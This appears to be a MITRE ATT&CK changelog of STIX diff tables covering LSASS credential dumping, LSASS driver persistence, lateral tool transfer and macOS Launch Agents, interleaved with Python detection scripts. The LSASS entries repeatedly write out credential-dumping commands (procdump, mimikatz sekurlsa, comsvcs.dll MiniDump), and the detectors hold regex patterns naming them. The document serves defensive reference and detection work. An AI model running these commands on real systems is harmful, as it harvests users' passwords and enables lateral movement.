LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem) Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads. |
| external_references[1]['source_name'] | Microsoft Security Subsystem | Microsoft LSA Protection Mar 2014 |
| external_references[1]['description'] | Microsoft. (n.d.). Security Subsystem Architecture. Retrieved November 27, 2017. | Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017. |
| external_references[1]['url'] | https://technet.microsoft.com/library/cc961760.aspx | https://technet.microsoft.com/library/dn408187.aspx |
| external_references[2]['source_name'] | Microsoft LSA Protection Mar 2014 | Microsoft DLL Security |
| external_references[2]['description'] | Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017. | Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November 27, 2017. |
| external_references[2]['url'] | https://technet.microsoft.com/library/dn408187.aspx | https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx |
| external_references[3]['source_name'] | Microsoft DLL Security | Microsoft Security Subsystem |
| external_references[3]['description'] | Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November 27, 2017. | Microsoft. (n.d.). Security Subsystem Architecture. Retrieved November 27, 2017. |
| external_references[3]['url'] | https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx | https://technet.microsoft.com/library/cc961760.aspx |
| x_mitre_data_sources[2] | Driver: Driver Load | File: File Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Driver: Driver Load |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Creation |
| Old Description | New Description |
|---|---|
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* procdump -ma lsass.exe lsass_dump
Locally, mimikatz can be run using:
* sekurlsa::Minidump lsassdump.dmp
* sekurlsa::logonPasswords
Built-in Windows tools such as comsvcs.dll can also be used:
* rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection) |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* procdump -ma lsass.exe lsass_dump
Locally, mimikatz can be run using:
* sekurlsa::Minidump lsassdump.dmp
* sekurlsa::logonPasswords
Built-in Windows tools such as comsvcs.dll can also be used:
* rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
|
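
The LSASS description above (the same text also appears in the `description` field change further down) names three artefacts a defender can key on: a process opening lsass.exe with memory-read rights, the procdump / comsvcs.dll / mimikatz command lines, and additions to the `Lsa\Security Packages` value. The following detection logic is an added example written for this page, not ATT&CK or Sysmon code. It assumes Sysmon Event ID 10 (ProcessAccess) and Event ID 1 (ProcessCreate) field names, a per-environment allowlist of legitimate lsass readers, and a baseline list of built-in SSP names; the sample events are constructed.

```python
"""Flag LSASS credential-dumping indicators in Sysmon-style telemetry.

Added example, not from the ATT&CK page. Assumptions: Sysmon Event ID 10
(ProcessAccess) and Event ID 1 (ProcessCreate) field names, a per-environment
allowlist of legitimate lsass readers, and a baseline of built-in SSP names.
"""
import re

# Process access right from winnt.h; reading lsass memory needs PROCESS_VM_READ.
PROCESS_VM_READ = 0x0010

# Processes that legitimately open lsass with read rights (assumption: tune per environment).
ALLOWLISTED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

# Command-line shapes taken from the technique description above.
DUMP_CMDLINE_PATTERNS = {
    "comsvcs MiniDump": re.compile(r"comsvcs\.dll[\s,]+minidump\b", re.I),
    "procdump full dump": re.compile(r"procdump(?:64)?(?:\.exe)?\b.*\s-ma\b.*\blsass", re.I),
    "mimikatz sekurlsa": re.compile(r"sekurlsa::", re.I),
}

# Built-in SSP names as listed in Lsa\Security Packages (assumption: baseline for a
# current Windows host; capture the real value with `reg query` before relying on it).
BASELINE_SSPS = {"kerberos", "msv1_0", "schannel", "wdigest", "tspkg", "pku2u", "cloudap"}


def suspicious_lsass_access(event):
    """Reason string for a non-allowlisted read of lsass memory, else None."""
    if event.get("EventID") != 10:
        return None
    if not event["TargetImage"].lower().endswith(r"\lsass.exe"):
        return None
    granted = int(event["GrantedAccess"], 16)
    if not granted & PROCESS_VM_READ:
        return None  # no VM_READ right: this handle cannot dump credentials
    if event["SourceImage"].lower() in ALLOWLISTED_SOURCES:
        return None
    return f"{event['SourceImage']} opened lsass with 0x{granted:x}"


def suspicious_command_line(event):
    """Name of the matching dump-tool pattern for a ProcessCreate event, else None."""
    if event.get("EventID") != 1:
        return None
    for name, pattern in DUMP_CMDLINE_PATTERNS.items():
        if pattern.search(event.get("CommandLine", "")):
            return name
    return None


def unknown_security_packages(values):
    """Entries of a Security Packages REG_MULTI_SZ that are not in the baseline."""
    return sorted(v for v in values if v.strip().lower() not in BASELINE_SSPS)


def scan(events):
    """Return (EventID, reason) for every event that matches an indicator."""
    findings = []
    for event in events:
        reason = suspicious_lsass_access(event) or suspicious_command_line(event)
        if reason:
            findings.append((event["EventID"], reason))
    return findings


# Constructed sample telemetry: a handle without read rights, a full-access handle
# from an unexpected path, one comsvcs.dll dump command and one unrelated process.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\Downloads\procdump64.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "CommandLine":
     r"rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 624 C:\Temp\lsass.dmp full"},
    {"EventID": 1, "CommandLine": "notepad.exe report.txt"},
]

if __name__ == "__main__":
    for event_id, reason in scan(SAMPLE_EVENTS):
        print(f"EID {event_id}: {reason}")
    print("unexpected SSPs:", unknown_security_packages(["kerberos", "msv1_0", "mimilib"]))
```

The access-mask check is the part that matters: plenty of software opens lsass for `PROCESS_QUERY_LIMITED_INFORMATION` (0x1000), so alerting on every handle is noise, while a handle without `PROCESS_VM_READ` cannot read credential material at all. The SSP check is only useful against a baseline captured from the same build, and it does not catch the `AddSecurityPackage` path, which loads a package without touching the Registry value until the next boot.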
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 19:55:01.368000+00:00 | 2022-10-06 16:16:53.388000+00:00 |
| description | Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* procdump -ma lsass.exe lsass_dump
Locally, mimikatz can be run using:
* sekurlsa::Minidump lsassdump.dmp
* sekurlsa::logonPasswords
Built-in Windows tools such as comsvcs.dll can also be used:
* rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
|
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* procdump -ma lsass.exe lsass_dump
Locally, mimikatz can be run using:
* sekurlsa::Minidump lsassdump.dmp
* sekurlsa::logonPasswords
Built-in Windows tools such as comsvcs.dll can also be used:
* rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
|
| external_references[1]['source_name'] | Volexity Exchange Marauder March 2021 | Medium Detecting Attempts to Steal Passwords from Memory |
| external_references[1]['description'] | Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021. | French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019. |
| external_references[1]['url'] | https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ | https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea |
| external_references[2]['source_name'] | Symantec Attacks Against Government Sector | Graeber 2014 |
| external_references[2]['description'] | Symantec. (2021, June 10). Attacks Against the Government Sector. Retrieved September 28, 2021. | Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017. |
| external_references[2]['url'] | https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf | http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html |
| external_references[3]['source_name'] | Graeber 2014 | Volexity Exchange Marauder March 2021 |
| external_references[3]['description'] | Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017. | Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021. |
| external_references[3]['url'] | http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html | https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/ |
| external_references[4]['source_name'] | TechNet Blogs Credential Protection | Powersploit |
| external_references[4]['description'] | Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018. | PowerSploit. (n.d.). Retrieved December 4, 2014. |
| external_references[4]['url'] | https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/ | https://github.com/mattifestation/PowerSploit |
| external_references[5]['source_name'] | Medium Detecting Attempts to Steal Passwords from Memory | Symantec Attacks Against Government Sector |
| external_references[5]['description'] | French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019. | Symantec. (2021, June 10). Attacks Against the Government Sector. Retrieved September 28, 2021. |
| external_references[5]['url'] | https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea | https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf |
| external_references[6]['source_name'] | Powersploit | TechNet Blogs Credential Protection |
| external_references[6]['description'] | PowerSploit. (n.d.). Retrieved December 4, 2014. | Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018. |
| external_references[6]['url'] | https://github.com/mattifestation/PowerSploit | https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/ |
| x_mitre_data_sources[2] | Process: Process Access | Process: OS API Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Access |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: OS API Execution |
| Old Description | New Description |
|---|---|
| Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. | Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019) Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095). |
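
The detection guidance for this technique (monitor file creation over SMB or FTP, and look for the same file hash or name appearing on several hosts) is easy to state and awkward to implement because the signal is a cross-host correlation rather than a single event. The following is an added example written for this page, not ATT&CK code. It assumes one `key=value` line per Sysmon Event ID 11 (FileCreate) with a `sha256` field, and that a file written onto a host through an SMB share shows `image=System`, since the kernel performs the write on the receiving side; the log lines are constructed.

```python
"""Correlate file-creation telemetry across hosts to spot laterally copied tools.

Added example, not from the ATT&CK page. Assumptions: one "key=value" line per
Sysmon Event ID 11 (FileCreate) with a sha256 field, and that files written to a
host over SMB appear with image=System (the kernel performs the write).
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)   # assumption: how quickly a staged copy-to-many happens
MIN_HOSTS = 3                    # assumption: distinct hosts before a hash is flagged


def parse_line(line):
    """Turn '<ts> k=v k=v ...' into a dict with a datetime under 'ts'."""
    ts, *fields = line.split()
    event = {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def spreading_hashes(events, window=WINDOW, min_hosts=MIN_HOSTS):
    """Map sha256 -> details for hashes created on >= min_hosts hosts inside `window`."""
    by_hash = defaultdict(list)
    for event in events:
        by_hash[event["sha256"]].append(event)

    flagged = {}
    for digest, evs in by_hash.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            # every later event that still falls inside the window opened by `first`
            cluster = [e for e in evs[i:] if e["ts"] - first["ts"] <= window]
            hosts = {e["host"] for e in cluster}
            if len(hosts) >= min_hosts:
                flagged[digest] = {
                    "hosts": sorted(hosts),
                    "paths": sorted({e["path"] for e in cluster}),
                    "smb_writes": sum(e["image"] == "System" for e in cluster),
                }
                break
    return flagged


# Constructed sample: one binary dropped on three hosts via SMB within seven minutes,
# one user document, and one update package that reaches hosts a day apart.
SAMPLE_LOG = r"""
2024-05-01T10:02:13Z host=WS01 image=System path=C:\Windows\Temp\svc.exe sha256=aaaa1111
2024-05-01T10:05:40Z host=WS02 image=System path=C:\Windows\Temp\svc.exe sha256=aaaa1111
2024-05-01T10:09:02Z host=FS01 image=System path=C:\PerfLogs\svc.exe sha256=aaaa1111
2024-05-01T10:15:00Z host=WS01 image=C:\Windows\explorer.exe path=C:\Users\amy\report.docx sha256=bbbb2222
2024-05-01T09:00:00Z host=WS05 image=C:\Windows\System32\svchost.exe path=C:\Windows\SoftwareDistribution\Download\x.cab sha256=cccc3333
2024-05-02T09:00:00Z host=WS06 image=C:\Windows\System32\svchost.exe path=C:\Windows\SoftwareDistribution\Download\x.cab sha256=cccc3333
2024-05-03T09:00:00Z host=WS07 image=C:\Windows\System32\svchost.exe path=C:\Windows\SoftwareDistribution\Download\x.cab sha256=cccc3333
""".strip().splitlines()


def scan_log(lines=SAMPLE_LOG, window=WINDOW, min_hosts=MIN_HOSTS):
    """Parse the lines and return the hashes that spread across hosts."""
    return spreading_hashes([parse_line(line) for line in lines], window, min_hosts)


if __name__ == "__main__":
    for digest, info in scan_log().items():
        print(digest, info)
```

The window is what separates a tool being staged across a subnet from a patch rolling out over a week: with the 30-minute default only `aaaa1111` is reported, and widening the window to several days pulls in the update package too. Correlating on hash rather than filename also survives the renaming adversaries do between hosts, which the filename-based variant the guidance mentions does not.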
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-28 21:17:42.490000+00:00 | 2022-04-19 15:34:49.016000+00:00 |
| description | Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. | Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) to connected network shares or with authenticated connections via [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001).(Citation: Unit42 LockerGoga 2019) Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and [ftp](https://attack.mitre.org/software/S0095). |
| x_mitre_data_sources[0] | Network Share: Network Share Access | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Flow | File: File Creation |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Content | File: File Metadata |
| x_mitre_data_sources[6] | File: File Creation | Network Share: Network Share Access |
| x_mitre_data_sources[7] | File: File Metadata | Network Traffic: Network Traffic Flow |
| x_mitre_detection | Monitor for file creation and files transferred within a network using protocols such as SMB. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts. | Monitor for file creation and files transferred within a network using protocols such as SMB or FTP. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts. |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Unit42 LockerGoga 2019', 'description': 'Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.', 'url': 'https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/'} |
| Description |
|---|
Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the Label, ProgramArguments , and RunAtLoad keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.
Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.
Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) |
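
The description gives the concrete shape of a malicious Launch Agent: a `.plist` in one of the three LaunchAgents directories whose `ProgramArguments` points at the payload, with `RunAtLoad` or `KeepAlive` set, and often a `Label` borrowed from the OS or a benign product. The scanner below is an added example written for this page, not ATT&CK or Apple code. The trusted executable prefixes and the treatment of `com.apple.*` labels are local policy assumed here, not an Apple rule, and the two sample plists are constructed inline.

```python
"""Audit LaunchAgent property lists for persistence that does not belong.

Added example, not from the ATT&CK page. Assumptions: the trusted executable
prefixes below and the treatment of com.apple.* labels are local policy, not
an Apple rule; the sample plists are constructed inline.
"""
import plistlib
from pathlib import Path

LAUNCH_AGENT_DIRS = [
    "/System/Library/LaunchAgents",
    "/Library/LaunchAgents",
    str(Path.home() / "Library/LaunchAgents"),
]

# Where binaries started by a LaunchAgent are expected to live (assumption: tune per fleet).
TRUSTED_PREFIXES = ("/System/", "/usr/bin/", "/usr/sbin/", "/usr/libexec/",
                    "/Library/Apple/", "/Applications/")
# Narrower set for jobs whose Label claims to be Apple's.
APPLE_ONLY_PREFIXES = ("/System/", "/usr/", "/Library/Apple/")


def assess(plist_bytes):
    """Summarise one LaunchAgent plist and list the reasons it looks suspicious."""
    d = plistlib.loads(plist_bytes)
    label = d.get("Label", "")
    args = d.get("ProgramArguments") or ([d["Program"]] if "Program" in d else [])
    exe = args[0] if args else ""
    # RunAtLoad runs the job at login; KeepAlive (bool or dict) restarts it when it exits.
    persistent = bool(d.get("RunAtLoad")) or bool(d.get("KeepAlive"))

    reasons = []
    if persistent and exe and not exe.startswith(TRUSTED_PREFIXES):
        reasons.append("persistent job runs binary outside trusted paths")
    if any(part.startswith(".") for part in Path(exe).parts[1:]):
        reasons.append("executable lives in a hidden directory")
    if label.startswith("com.apple.") and exe and not exe.startswith(APPLE_ONLY_PREFIXES):
        reasons.append("Apple-style label but non-Apple binary")
    if any(tok in " ".join(args) for tok in ("curl ", "bash -c", "osascript", "python -c")):
        reasons.append("arguments spawn an interpreter or downloader")
    return {"label": label, "exe": exe, "persistent": persistent, "reasons": reasons}


def scan_dirs(dirs=LAUNCH_AGENT_DIRS):
    """Assess every *.plist under the given LaunchAgent directories."""
    findings = []
    for directory in map(Path, dirs):
        if not directory.is_dir():
            continue
        for plist in directory.glob("*.plist"):
            try:
                result = assess(plist.read_bytes())
            except (plistlib.InvalidFileException, ValueError) as exc:
                result = {"label": plist.name, "exe": "", "persistent": False,
                          "reasons": [f"unparseable plist: {exc}"]}
            result["path"] = str(plist)
            findings.append(result)
    return findings


# Constructed samples: a benign system agent and one shaped like the description above.
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.apple.notes.sync",
    "ProgramArguments": ["/System/Library/CoreServices/notesd"],
    "RunAtLoad": True,
})
SUSPICIOUS_PLIST = plistlib.dumps({
    "Label": "com.apple.softwareupdate.helper",
    "ProgramArguments": ["/Users/amy/Library/.cache/updater", "-s"],
    "RunAtLoad": True,
    "KeepAlive": {"SuccessfulExit": False},
})

if __name__ == "__main__":
    for sample in (BENIGN_PLIST, SUSPICIOUS_PLIST):
        print(assess(sample))
    for finding in scan_dirs():
        if finding["reasons"]:
            print(finding)
```

Run it as the user whose agents you want to audit: `~/Library/LaunchAgents` is per-user, and a user-level agent executes with that user's permissions only, which is why the description stresses that these are user-level persistence. Unparseable plists are reported rather than skipped, because a deliberately malformed file is itself worth a look.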
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Antonio Piazza, @antman1p'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-03 20:11:51.687000+00:00 | 2022-04-21 16:13:00.598000+00:00 |
| external_references[2]['source_name'] | OSX Keydnap malware | Sofacy Komplex Trojan |
| external_references[2]['description'] | Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017. | Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017. |
| external_references[2]['url'] | https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ | https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/ |
| external_references[3]['source_name'] | Antiquated Mac Malware | OceanLotus for OS X |
| external_references[3]['description'] | Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017. | Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017. |
